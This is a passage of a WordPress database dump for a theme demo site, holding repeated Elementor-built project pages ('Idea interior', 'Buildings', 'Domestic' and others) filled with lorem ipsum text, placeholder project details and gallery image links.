data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Luxury room','','publish','open','closed','','luxury-room-2','','','2022-06-14 02:21:05','2022-06-14 02:21:05','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=629',0,'ova_projects','',0),(4641,1,'2022-06-14 02:22:42','2022-06-14 02:22:42','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Idea interior</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Idea interior','','publish','open','closed','','idea-interior-2','','','2022-06-14 02:22:42','2022-06-14 02:22:42','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=634',0,'ova_projects','',0),(4642,1,'2022-06-14 02:24:34','2022-06-14 02:24:34','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Buildings</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Buildings','','publish','open','closed','','buildings-2','','','2022-06-14 02:24:34','2022-06-14 02:24:34','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=639',0,'ova_projects','',0),(4643,1,'2022-06-14 02:49:34','2022-06-14 02:49:34','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Domestic</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Domestic','','publish','open','closed','','domestic-2','','','2022-06-14 02:49:34','2022-06-14 02:49:34','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=657',0,'ova_projects','',0),(4644,1,'2022-06-14 02:52:01','2022-06-14 02:52:01','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Philip Johnson</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Philip Johnson','','publish','open','closed','','philip-johnson-2','','','2022-06-14 02:52:01','2022-06-14 02:52:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=662',0,'ova_projects','',0),(4645,1,'2022-06-14 02:54:08','2022-06-14 02:54:08','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Richard Rogers</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed 